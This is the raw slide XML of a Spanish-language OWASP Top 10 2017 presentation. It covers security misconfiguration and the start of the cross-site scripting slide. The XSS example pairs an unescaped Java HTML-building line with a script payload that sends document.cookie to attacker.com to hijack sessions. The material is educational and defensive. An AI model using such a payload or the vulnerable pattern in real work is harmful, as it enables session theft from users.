                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> adecuado en cualquier parte del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tecnológico, o permisos mal configurados en los servicios de la nube.</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Se encuentran instaladas o habilitadas características innecesarias (ej. puertos, servicios, páginas, cuentas o permisos).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Las cuentas predeterminadas y sus contraseñas siguen activas y sin cambios.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El manejo de errores revela a los usuarios trazas de la aplicación u otros mensajes demasiado informativos.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Para los sistemas actualizados, las nuevas funciones de seguridad se encuentran desactivadas o no se encuentran configuradas de forma adecuada o segura.</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Las configuraciones de seguridad en el servidor de aplicaciones, en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de aplicación (ej., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts, Spring, ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), bibliotecas o bases de datos no se encuentran especificados con valores seguros.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El servidor no envía directrices o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>cabeceras de seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a los clientes o se encuentran configurados con valores inseguros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El software se encuentra desactualizado o posee vulnerabilidades (ver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9: 2017 Uso de componentes con vulnerabilidades conocidas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="840" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sin un proceso de configuración de seguridad de aplicación concertado y repetible, los sistemas corren un mayor riesgo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="88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6"/>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4"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Para conocer más sobre requisitos adicionales en esta área, consulte el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Estándar de Verificación de Seguridad en Aplicaciones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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deben implementarse procesos seguros de instalación, incluyendo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proceso de fortalecimiento reproducible que agilice y facilite la implementación de otro entorno asegurado. Los entornos de desarrollo, de control de calidad (QA) y de Producción deben configurarse de manera idéntica y con diferentes credenciales para cada entorno. Este proceso puede automatizarse para minimizar el esfuerzo requerido para configurar cada nuevo entorno seguro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use una plataforma minimalista sin funcionalidades innecesarias, componentes, documentación o ejemplos. Elimine o no instale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y funcionalidades no utilizadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Siga un proceso para revisar y actualizar las configuraciones apropiadas de acuerdo a las advertencias de seguridad y siga un proceso de gestión de parches. En particular, revise los permisos de almacenamiento en la nube (por ejemplo, los permisos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buckets S3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="86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60" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La aplicación debe tener una arquitectura segmentada que proporcione una separación efectiva y segura entre componentes y acceso a terceros, contenedores o grupos de seguridad en la nube (ACLs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Envíe directivas de seguridad a los clientes (por ej. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>cabeceras de seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="86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60" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilice un proceso automatizado para verificar la efectividad de los ajustes y configuraciones en todos los ambientes.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A6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="2000" noProof="0" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2600" noProof="0" dirty="0"/>
              <a:t>Configuración de Seguridad Incorrecta</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="2600" noProof="0"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931593455"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="226188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Explotabilidad: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bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia: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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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Técnico: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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los atacantes a menudo intentarán explotar vulnerabilidades sin parchear o acceder a cuentas por defecto, páginas no utilizadas, archivos y directorios desprotegidos, etc. para obtener acceso o conocimiento del sistema o del negocio.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="87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es-AR" sz="870" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Configuraciones incorrectas de seguridad pueden ocurrir en cualquier nivel del </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tecnológico, incluidos los servicios de red, la plataforma, el servidor web, el servidor de aplicaciones, la base de datos, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>frameworks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, el código personalizado y máquinas virtuales preinstaladas, contenedores, etc. Los escáneres automatizados son útiles para detectar configuraciones erróneas, el uso de cuentas o configuraciones predeterminadas, servicios innecesarios, opciones heredadas, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="87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es-AR" sz="870" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los defectos frecuentemente dan a los atacantes acceso no autorizado a algunos datos o funciones del sistema. Ocasionalmente, estos errores resultan en un completo compromiso del sistema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="870" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="870" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="87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Escenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la aplicación utiliza datos no confiables en la construcción del código HTML sin validarlos o codificarlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='creditcard' type='TEXT' value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter("CC") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El atacante modifica el parámetro “CC” en el navegador por</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Este ataque causa que el identificador de sesión de la víctima sea enviado al sitio web del atacante, permitiéndole secuestrar la sesión actual del usuario. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nota:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> los atacantes también pueden utilizar XSS para anular cualquier defensa contra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Falsificación de Peticiones en Sitios Cruzados (CSRF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>que la aplicación pueda utilizar.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820" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existen tres formas usuales de XSS para atacar a los navegadores de los usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
